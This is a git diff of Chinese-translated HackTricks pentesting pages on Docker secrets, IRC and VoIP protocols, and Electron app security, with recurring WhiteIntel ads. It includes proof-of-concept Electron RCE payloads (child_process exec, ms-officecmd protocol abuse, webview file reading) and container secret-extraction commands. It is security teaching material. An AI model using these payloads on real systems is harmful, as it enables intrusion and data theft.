如果您在使用 Docker 的主机内部,您可以[**阅读此信息尝试提升权限**](../linux-hardening/privilege-escalation/#writable-docker-socket)。
### 在运行的 Docker 容器中发现秘密
### 在运行的 Docker 容器中发现秘密
```bash
docker ps [| grep <kubernetes_service_name>]
docker inspect <docker_id>
```
检查**env**(环境变量部分)以查找秘密信息,可能会发现:
检查 **env**(环境变量部分)以查找秘密信息,可能会发现:
- 密码。
- IP地址。
- 端口。
- 路径。
- 其他…。
* 密码。
* IP 地址。
* 端口。
* 路径。
* 其他… .
如果要提取文件:
```bash
@ -251,7 +253,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
* `./docker-bench-security.sh`
* 您可以使用工具[https://github.com/kost/dockscan](https://github.com/kost/dockscan)来检查您当前的Docker安装。
* `dockscan -v unix:///var/run/docker.sock`
* 您可以使用工具[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)来查看在不同安全选项下运行时容器将具有的权限。这对于了解使用某些安全选项运行容器的影响很有用:
* 您可以使用工具[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)来查看以不同安全选项运行时容器将具有的特权。这对于了解使用某些安全选项运行容器的影响很有用:
* `docker run --rm -it r.j3ss.co/amicontained`
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
@ -287,7 +289,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
#### 记录可疑活动
* 您可以使用工具[https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco)来检测**运行容器中的可疑行为**。
* 请注意下面的代码块中**Falco如何编译内核模块并插入**。之后,它加载规则并**开始记录可疑活动**。在这种情况下它检测到启动了2个特权容器其中一个带有敏感挂载点并在几秒钟后检测到一个容器内打开了一个shell。
* 请注意下面的代码块中**Falco如何编译内核模块并插入**。之后,它加载规则并**开始记录可疑活动**。在这种情况下它检测到启动了2个特权容器其中一个带有敏感挂载点几秒钟后检测到一个容器内打开了一个shell。
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -338,9 +340,9 @@ falco-probe found and loaded in dkms
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 提供动力的搜索引擎,提供免费功能,用于检查公司或其客户是否已受到 **窃取恶意软件****损害**
@ -360,7 +362,7 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>

22
network-services-pentesting/pentesting-irc.md
View file

@ -6,17 +6,17 @@
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) 上 **关注**我们****
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享**您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -50,7 +50,7 @@ IRC 可以支持 **TLS**。
nc -vn <IP> <PORT>
openssl s_client -connect <IP>:<PORT> -quiet
```
### 手
### 手
在这里,您可以看到如何使用一些**随机昵称**连接并访问IRC然后枚举一些有趣的信息。您可以在[这里](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP)了解更多IRC命令。
```bash
@ -97,13 +97,13 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
* `查找您的主机名`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -111,11 +111,11 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。

40
network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
View file

@ -7,20 +7,20 @@
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -32,7 +32,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### SIP会话初始协议
这是行业标准,了解更多信息请查看:
这是行业标准,更多信息请查看:
{% content-ref url="sip-session-initiation-protocol.md" %}
[sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
@ -40,10 +40,10 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### MGCP媒体网关控制协议
MGCP媒体网关控制协议是在RFC 3435中概述的**信令**和**呼叫** **控制协议**。它采用集中式架构,由三个主要组件组成:
MGCP媒体网关控制协议是在RFC 3435中概述的**信令**和**呼叫** **控制协议**。它在集中式架构中运行,由三个主要组件组成:
1. **呼叫代理或媒体网关控制器MGC**MGCP架构中的主网关负责**管理和控制媒体网关**。它处理呼叫设置、修改和终止过程。MGC使用MGCP协议与媒体网关通信。
2. **媒体网关MGs或从属网关**:这些设备在不同网络之间**转换数字媒体流**,例如传统的电路交换电话网络和分组交换IP网络。它们由MGC管理并执行从MGC接收到的命令。媒体网关可能包括转码、封装和回声消除等功能。
2. **媒体网关MGs或从属网关**:这些设备在不同网络之间**转换数字媒体流**例如传统的电路交换电话和分组交换IP网络。它们由MGC管理并执行从MGC接收到的命令。媒体网关可能包括转码、封装和回声消除等功能。
3. **信令网关SGs**:这些网关负责在不同网络之间**转换信令消息**实现传统电话系统例如SS7和基于IP的网络例如SIP或H.323)之间的无缝通信。信令网关对于互操作性至关重要,确保呼叫控制信息在不同网络之间得到正确传递。
总之MGCP在呼叫代理中集中了呼叫控制逻辑简化了媒体和信令网关的管理提供了更好的可扩展性、可靠性和效率提高了电信网络的效率。
@ -57,23 +57,23 @@ SCCP是一种轻量级协议简化了呼叫控制服务器与端点设备之
基于SCCP系统的主要组件包括
1. **呼叫控制服务器**:这个服务器通常是思科统一通信管理器,负责管理呼叫设置、修改和终止过程,以及其他电话功能,如呼叫转移、呼叫转接和呼叫保持。
2. **SCCP端点**:这些设备如IP电话、视频会议设备或其他使用SCCP与呼叫控制服务器通信的思科语音和视频终端。它们向服务器注册发送和接收信令消息并遵循呼叫控制服务器提供的指令进行呼叫处理。
3. **网关**:这些设备,如语音网关或媒体网关,负责在不同网络之间转换媒体流,如传统的电路交换电话网络和分组交换IP网络。它们还可能包括其他功能如转码或回声消除。
2. **SCCP端点**:这些设备如IP电话、视频会议单元或其他使用SCCP与呼叫控制服务器通信的思科语音和视频终端。它们向服务器注册发送和接收信令消息并遵循呼叫控制服务器提供的指令进行呼叫处理。
3. **网关**这些设备如语音网关或媒体网关负责在不同网络之间转换媒体流如传统的电路交换电话和分组交换IP网络。它们还可能包括其他功能如转码或回声消除。
SCCP提供了思科呼叫控制服务器和端点设备之间简单高效的通信方法。然而值得注意的是**SCCP是一种专有协议**这可能会限制与非思科系统的互操作性。在这种情况下其他标准VoIP协议如SIP可能更适合。
### H.323
H.323是用于在基于分组交换网络如基于IP的网络上进行多媒体通信的一套协议包括语音、视频和数据会议。它由**国际电信联盟**ITU-T开发为管理多媒体通信会话提供了全面的框架。
H.323是用于在基于分组交换网络如基于IP的网络上进行多媒体通信的**一套协议**,包括语音、视频和数据会议。它由**国际电信联盟**ITU-T开发为管理多媒体通信会话提供了全面的框架。
H.323套件的一些关键组件包括:
1. **终端**这些是支持H.323的端点设备如IP电话、视频会议系统或软件应用程序,可以参与多媒体通信会话
2. **网关**:这些设备在不同网络之间转换媒体流,如传统的电路交换电话网络和分组交换IP网络实现H.323与其他通信系统的互操作性。它们还可能包括其他功能,如转码或回声消除。
1. **终端**这些是支持H.323并可以参与多媒体通信会话的端点设备如IP电话、视频会议系统或软件应用程序。
2. **网关**这些设备在不同网络之间转换媒体流如传统的电路交换电话和分组交换IP网络实现H.323与其他通信系统之间的互操作性。它们还可能包括其他功能,如转码或回声消除。
3. **网关控制器**这些是H.323网络中提供呼叫控制和管理服务的可选组件。它们执行地址转换、带宽管理和接入控制等功能,有助于管理和优化网络资源。
4. **多点控制单元MCUs**这些设备通过管理和混合来自多个端点的媒体流促进多点会议。MCUs支持视频布局控制、语音激活切换和持续存在等功能使得能够举办具有多个参与者的大规模会议成为可能。
H.323支持一系列音频和视频编解码器以及其他补充服务如呼叫转移、呼叫转接、呼叫保持和呼叫等待。尽管在VoIP的早期阶段被广泛采用但H.323逐渐被更现代、更灵活的协议如**会话初始协议SIP**所取代后者提供更好的互操作性和更容易的实施。然而H.323仍在许多传统系统中使用,并继续得到各种设备供应商的支持。
H.323支持一系列音频和视频编解码器以及其他补充服务如呼叫转移、呼叫转接、呼叫保持和呼叫等待。尽管在VoIP的早期阶段被广泛采用但H.323逐渐被更现代灵活的协议如**会话初始协议SIP**所取代后者提供更好的互操作性和更容易的实施。然而H.323仍在许多传统系统中使用,并继续得到各种设备供应商的支持。
### IAXInter Asterisk eXchange
@ -83,16 +83,16 @@ IAX以其**简单性、高效性和易实现性**而闻名。IAX的一些关键
1. **单个UDP端口**IAX使用单个UDP端口4569进行信令和媒体流量简化了防火墙和NAT穿越使其更容易在各种网络环境中部署。
2. **二进制协议**与SIP等基于文本的协议不同IAX是一种二进制协议减少了其带宽消耗并使其更有效地传输信令和媒体数据。
3. **干线**IAX支持干线允许多个呼叫合并为单个网络连接,减少开销,提高带宽利用率。
3. **干线**IAX支持干线允许多个呼叫组合成单个网络连接,减少开销,提高带宽利用率。
4. **本地加密**IAX内置支持加密使用RSA进行密钥交换和AES进行媒体加密提供端点之间的安全通信。
5. **点对点通信**IAX可用于端点之间的直接通信无需中央服务器实现更简单、更高效的呼叫路由。
尽管IAX具有诸多优点如其主要关注Asterisk生态系统和与更成熟的协议如SIP相比较少的广泛采用也存在一些局限性。因此对于与非Asterisk系统或设备的互操作性IAX可能不是最佳选择。然而对于在Asterisk环境中工作的人员IAX为VoIP通信提供了强大高效的解决方案。
尽管IAX具有一些优点如其主要关注Asterisk生态系统和与更成熟的协议如SIP相比采用程度较低但IAX可能不是与非Asterisk系统或设备互操作性最佳选择。然而对于在Asterisk环境中工作的人员IAX为VoIP通信提供了强大高效的解决方案。
## 传输和传输协议
### SDP会话描述协议
SDP会话描述协议是一种用于描述多媒体会话特征如语音、视频或数据会议的**基于文本的格式**通过IP网络传输。它由**互联网工程任务组IETF**开发,并在**RFC 4566**中定义。SDP不处理实际的媒体传输或会话建立而是与其他信令协议如**SIP会话初始协议**)一起使用,用于协商和交换有关媒体流及其属性的信息。
SDP会话描述协议是一种用于描述多媒体会话特征如语音、视频或数据会议的**基于文本的格式**通过IP网络传输。它由**互联网工程任务组IETF**开发,定义在**RFC 4566**中。SDP不处理实际的媒体传输或会话建立而是与其他信令协议如**SIP会话初始协议**)一起使用,用于协商和交换有关媒体流及其属性的信息。
SDP的一些关键元素包括
@ -104,7 +104,7 @@ SDP的一些关键元素包括
SDP通常在以下过程中使用
1. 发起方创建所提议的多媒体会话的SDP描述包括媒体流及其属性的详细信息。
2. SDP描述发送给接收方通常嵌入在信令协议消息如SIP或RTSP
2. SDP描述发送给接收方通常嵌入在信令协议消息如SIP或RTSP
3. 接收方处理SDP描述并根据其能力可能接受、拒绝或修改所提议的会话。
4. 最终的SDP描述作为信令协议消息的一部分发送回发起方完成协商过程。
@ -112,9 +112,9 @@ SDP的简单性和灵活性使其成为在各种通信系统中描述多媒体
### RTP / RTCP / SRTP / ZRTP
1. **RTP实时传输协议**RTP是一种设计用于在IP网络上传输音频、视频数据或其他实时媒体的网络协议。由**IETF**开发,并在**RFC 3550**中定义RTP通常与信令协议如SIP和H.323一起使用以实现多媒体通信。RTP提供了媒体流的**同步**、**排序**和**时间戳**机制,有助于确保流畅和及时的媒体播放。
1. **RTP实时传输协议**RTP是一种设计用于在IP网络上传输音频、视频数据或其他实时媒体的网络协议。由**IETF**开发,定义在**RFC 3550**中RTP通常与信令协议如SIP和H.323一起使用以实现多媒体通信。RTP提供了媒体流的**同步**、**排序**和**时间戳**机制,有助于确保媒体流畅和及时播放。
2. **RTCP实时传输控制协议**RTCP是RTP的伴随协议用于监控服务质量QoS并提供有关媒体流传输的反馈。与RTP在同一**RFC 3550**中定义RTCP**定期在RTP会话的参与者之间交换控制数据包**。它共享诸如丢包、抖动和往返时间等信息,有助于诊断和适应网络条件,提高整体媒体质量。
3. **SRTP安全实时传输协议**SRTP是RTP的扩展为媒体流提供**加密**、**消息认证**和**重放保护**,确保敏感音频和视频数据的安全传输。在**RFC 3711**中定义SRTP使用AES等加密算法进行加密使用HMAC-SHA1进行消息认证。SRTP通常与安全信令协议如通过TLS的SIP结合使用以在多媒体通信中提供端到端安全。
4. **ZRTPZimmermann实时传输协议**ZRTP是一种加密密钥协商协议为RTP媒体流提供**端到端加密**。由PGP的创始人Phil Zimmermann开发ZRTP在**RFC 6189**中描述。与依赖信令协议进行密钥交换的SRTP不同ZRTP设计为独立于信令协议工作。它使用**Diffie-Hellman密钥交换**在通信双方之间建立共享密钥无需先前信任或公钥基础设施PKI。ZRTP还包括功能,如**短认证字符串SAS**,以防止中间人攻击。
3. **SRTP安全实时传输协议**SRTP是RTP的扩展为媒体流提供**加密**、**消息认证**和**重放保护**,确保敏感音频和视频数据的安全传输。在**RFC 3711**中定义SRTP使用AES等加密算法进行加密使用HMAC-SHA1进行消息认证。SRTP通常与安全信令协议如通过TLS的SIP结合使用以在多媒体通信中提供端到端安全
4. **ZRTPZimmermann实时传输协议**ZRTP是一种加密密钥协商协议为RTP媒体流提供**端到端加密**。由PGP的创始人Phil Zimmermann开发ZRTP在**RFC 6189**中描述。与依赖信令协议进行密钥交换的SRTP不同ZRTP设计为独立于信令协议工作。它使用**Diffie-Hellman密钥交换**在通信双方之间建立共享密钥无需先前信任或公钥基础设施PKI。ZRTP还包括**短认证字符串SAS**等功能,以防止中间人攻击。
这些协议在**在IP网络上传递和保护实时多媒体通信**中发挥着重要作用。RTP和RTCP处理实际的媒体传输和质量监控而SRTP和ZRTP确保传输的媒体受到窃听、篡改和重放攻击的保护。

64
network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
View file

@ -14,11 +14,11 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -37,7 +37,7 @@ Electron结合了本地后端使用**NodeJS**)和前端(**Chromium**
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
在 Electron 应用的源代码中,在 `packet.json` 文件中,你可以找到指定了安全配置的 `main.js` 文件。
在 Electron 应用的源代码中,在 `packet.json` 文件中,你可以找到指定了 `main.js` 文件的安全配置
```json
{
"name": "standard-notes",
@ -67,8 +67,8 @@ win.loadURL(`file://path/to/index.html`);
- **`preload`** - 默认为空。
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - 默认为关闭。它将限制NodeJS可以执行的操作。
- Workers中的Node集成
- **`nodeIntegrationInSubframes`** - 默认为`off`
- 如果启用了**`nodeIntegration`**允许在Electron应用程序中的**iframe**中加载的网页中使用**Node.js API**。
- **`nodeIntegrationInSubframes`** - 默认为关闭
- 如果启用了**`nodeIntegration`**这将允许在Electron应用程序中的**iframe**中加载的网页中使用**Node.js API**。
- 如果**`nodeIntegration`**被**禁用**则预加载将在iframe中加载。
配置示例:
@ -137,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
设置中指定的脚本是在渲染器中的其他脚本之前加载的因此它具有对Node API的无限访问权限
这个设置中指定的脚本是在渲染器中的其他脚本之前加载的因此它具有对Node API的无限访问权限
```javascript
new BrowserWindow{
webPreferences: {
@ -174,16 +174,16 @@ runCalc();
## RCE: XSS + contextIsolation
_**contextIsolation**_引入了**网页脚本和JavaScript Electron内部代码之间的分离上下文**使得每个代码的JavaScript执行不会相互影响。这是一个必要的功能用于消除RCE的可能性。
_**contextIsolation**_引入了**网页脚本和JavaScript Electron内部代码之间的分离上下文**使得每个代码的JavaScript执行不会相互影响。这是一个必要的功能消除RCE的可能性。
如果上下文没有被隔离,攻击者可以:
1. 在渲染器中执行**任意JavaScript**XSS或导航到外部站)
1. 在渲染器中执行**任意JavaScript**XSS或导航到外部站
2. **覆盖**在preload或Electron内部代码中使用的内置方法为自己的函数
3. **触发**覆盖的函数的使用
4. RCE
内置方法可以被覆盖的两个地方在preload代码中或在Electron内部代码中
内置方法可以被覆盖的地方有两个在preload代码中或在Electron内部代码中
{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
@ -199,7 +199,7 @@ _**contextIsolation**_引入了**网页脚本和JavaScript Electron内部代码
### 绕过点击事件
如果在单击链接时应用了限制,您可能可以通过**中键单击**而不是常规左键单击来绕过它们
如果在单击链接时应用了限制,您可能可以通过**中键单击**而不是常规左键单击来绕过这些限制
```javascript
window.addEventListener('click', (e) => {
```
@ -209,12 +209,12 @@ window.addEventListener('click', (e) => {
在部署 Electron 桌面应用程序时,确保 `nodeIntegration``contextIsolation` 的正确设置至关重要。已经确定,通过这些设置可以有效防止针对预加载脚本或 Electron 主进程的**客户端远程代码执行RCE**。
用户与链接交互或打开新窗口时,会触发特定的事件侦听器,这对应用程序的安全性和功能至关重要:
用户与链接交互或打开新窗口时,会触发特定的事件侦听器,这对应用程序的安全性和功能至关重要:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
这些监听器被桌面应用程序**覆盖**,以实现自己的**业务逻辑**。 应用程序会评估导航链接应在内部打开还是在外部Web浏览器中打开。 这个决定通常通过一个名为`openInternally`的函数来做出。 如果这个函数返回`false`,则表示链接应在外部打开,利用`shell.openExternal`函数。
这些监听器被**桌面应用程序**覆盖,以实现自己的**业务逻辑**。该应用程序评估导航链接应在内部打开还是在外部Web浏览器中打开。通常通过一个名为`openInternally`的函数来做出决定。如果此函数返回`false`,则表示应在外部打开链接,利用`shell.openExternal`函数。
**以下是简化的伪代码:**
@ -222,7 +222,7 @@ webContents.on("will-navigate", function (event, url) {}
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
Electron JS安全最佳实践建议不要使用`openExternal`函数接受不受信任的内容因为这可能通过各种协议导致RCE。 操作系统支持可能触发RCE的不同协议。 有关此主题的详细示例和进一步解释,可以参考[此资源](https://positive.security/blog/url-open-rce#windows-10-19042)其中包括能够利用此漏洞的Windows协议示例。
Electron JS安全最佳实践建议不要使用`openExternal`函数接受不受信任的内容因为这可能通过各种协议导致RCE。操作系统支持可能触发RCE的不同协议。有关此主题的详细示例和进一步解释可以参考[此资源](https://positive.security/blog/url-open-rce#windows-10-19042)其中包括能够利用此漏洞的Windows协议示例。
**Windows协议利用示例包括:**
```html
@ -240,7 +240,7 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
```
## 读取内部文件XSS + contextIsolation
**禁用 `contextIsolation` 可以启用 `<webview>` 标签**,类似于 `<iframe>`,用于读取和外泄本地文件。提供的示例演示了如何利用此漏洞读取内部文件的内容:
**禁用 `contextIsolation` 可以启用 `<webview>` 标签**,类似于 `<iframe>`,用于读取和外泄本地文件。提供了一个示例,演示了如何利用此漏洞读取内部文件的内容:
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
@ -255,21 +255,21 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
```
## **RCE: XSS + 旧版 Chromium**
如果应用程序使用的 **chromium** 版本较 **旧**,并且存在已知的 **漏洞**,可能可以通过 **XSS** 利用它并获得 RCE。\
如果应用程序使用的 **Chromium** 版本较 **旧**,并且存在已知的 **漏洞**,可能可以通过 **XSS** 利用它并获得 **RCE**。\
您可以在这个 **writeup** 中看到一个示例:[https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **通过内部 URL 正则表达式绕过进行 XSS 钓鱼**
假设您发现了一个 XSS但是 **无法触发 RCE 或窃取内部文件**,您可以尝试使用它来通过钓鱼 **窃取凭据**
假设您发现了一个 **XSS**,但是 **无法触发 RCE 或窃取内部文件**,您可以尝试使用它来通过 **钓鱼** 窃取凭据。
首先,您需要了解当尝试打开新 URL 时会发生什么,检查前端的 JS 代码:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
调用**`openInternally`**将决定将链接在桌面窗口中打开,因为它是属于平台的链接,**或者**将在浏览器中作为第三方资源打开。
调用**`openInternally`**将决定将链接在**桌面窗口**中打开,因为它是属于平台的链接,**或者**将在**浏览器中作为第三方资源**打开。
如果函数使用的**正则表达式容易被绕过**(例如**未转义子域的点**),攻击者可以用XSS来**打开一个新窗口**,该窗口位于攻击者的基础设施中,**要求用户提供凭据**
如果函数使用的**正则表达式**容易被绕过(例如**未转义子域的点**),攻击者可以用XSS来**打开一个新窗口**,该窗口位于攻击者的基础设施中,**要求用户提供凭据**
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -280,7 +280,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
* [**Electronegativity**](https://github.com/doyensec/electronegativity) 是一个用于识别 Electron 应用程序中的配置错误和安全反模式的工具。
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) 是一个开源的 VS Code 插件,用于 Electron 应用程序,使用 Electronegativity。
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) 用于检查第三方库是否存在漏洞。
* [**Electro.ng**](https://electro.ng/):需要购买
* [**Electro.ng**](https://electro.ng/):需要购买
## 实验室
@ -316,16 +316,16 @@ npm start
* [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)
* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
* 更多关于Electron安全性的研究和写作请参考[https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* 有关 Electron 安全性的更多研究和报告,请访问 [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
